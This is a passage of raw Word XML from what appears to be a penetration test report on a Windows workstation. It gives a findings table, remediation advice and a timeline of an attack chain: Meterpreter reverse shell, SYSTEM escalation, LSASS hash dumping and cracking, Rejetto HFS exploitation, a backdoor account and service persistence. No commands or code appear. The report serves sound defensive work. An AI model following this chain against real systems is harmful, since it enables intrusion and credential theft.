              </w:rPr>
              <w:t xml:space="preserve">CVE / CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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Meterpreter Reverse Shell via HTTP Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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CWE-494</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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Initial access; remote code execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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Privilege Escalation to SYSTEM (Pipe Impersonation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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CWE-269</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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Complete OS takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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LSASS Memory Dump &amp; NTLM Hash Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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CWE-522</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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Credential compromise across accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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CVE-2024-23692 Rejetto HFS Unauthenticated RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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CVE-2024-23692</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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Unauthenticated remote shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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RDP Enabled &amp; Backdoor Admin Account Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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CWE-284</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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Persistent graphical admin access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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Windows Service Persistence Implant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="100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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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CWE-912</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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Reboot-surviving reverse backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1  Immediate Actions (Critical Priority)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch or uninstall Rejetto HFS immediately — CVE-2024-23692 has a public exploit and requires no authentication to trigger remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate DESKTOP-AR0UM8P from the network until all remediation steps are complete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Revoke and rotate all credentials on the compromised machine, with particular focus on the Administrator and accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the backdoor account 'ifti' created during the test and audit all local administrator group memberships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Locate and delete the persistence payload at C:\Windows\TEMP\flytjt.exe and disable the associated service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable RDP where not required; if RDP is essential, restrict access to VPN or jump-host connections with Network Level Authentication (NLA) enforced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2  Short-Term Hardening Measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy an Endpoint Detection and Response (EDR) solution capable of identifying process injection, LSASS memory access, and anomalous parent–child process relationships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Windows Credential Guard to prevent user-mode processes from reading LSASS memory contents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce the principle of least privilege — standard user accounts must not hold SeImpersonatePrivilege or access to delegation tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate Windows Defender Attack Surface Reduction (ASR) rules, particularly those targeting credential theft from LSASS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement application allowlisting to block execution of unsigned or unrecognised executables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict outbound network connections from workstations via host-based firewall rules, especially on non-standard reverse-shell ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3  Long-Term Strategic Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement network segmentation to reduce lateral movement opportunities between workstations and sensitive systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a SIEM platform to monitor for indicators of compromise, including anomalous process spawning, LSASS access patterns, registry changes enabling RDP, and unexpected outbound TCP connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce multi-factor authentication (MFA) for all remote access methods, including RDP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a continuous vulnerability scanning and patch management programme, with particular attention to internet-accessible services such as HFS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Deliver periodic security awareness training to users to reduce the risk of payload execution through phishing or social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Commission structured penetration tests at least annually to identify emerging attack surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Attack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260"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3300"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Action Performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4260"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D3B2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 ~06:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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msfvenom payload generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Malware1122.exe created (7,168 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 06:17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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Target executed malicious binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Meterpreter Session 1 established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 06:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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Incognito token abuse + getsystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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NT AUTHORITY\SYSTEM obtained (Session 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 ~06:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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LSASS process migration + hashdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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5 NTLM hashes extracted from memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 07:05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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Remmina RDP connection established</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Full graphical desktop access confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 07:16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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John the Ripper offline cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Administrator hash successfully cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 07:21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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Hashcat NTLM dictionary attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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33% of distinct hashes recovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 09:47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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CVE-2024-23692 exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Second SYSTEM-level session via Rejetto HFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 10:20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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Persistence service deployed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4260"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reboot-surviving backdoor installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
